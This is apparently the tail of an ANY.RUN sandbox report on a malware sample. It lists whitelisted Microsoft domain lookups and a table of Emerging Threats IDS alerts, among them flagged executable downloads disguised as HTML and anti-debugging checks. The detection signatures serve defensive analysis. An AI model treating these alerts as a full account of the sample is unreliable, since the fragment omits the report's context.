  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
crl.microsoft.com
  • 23.216.77.39
  • 23.216.77.25
  • 23.216.77.27
  • 23.216.77.7
  • 23.216.77.13
  • 23.216.77.11
  • 23.216.77.21
  • 23.216.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Misc activity
ET INFO Packed Executable Download
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b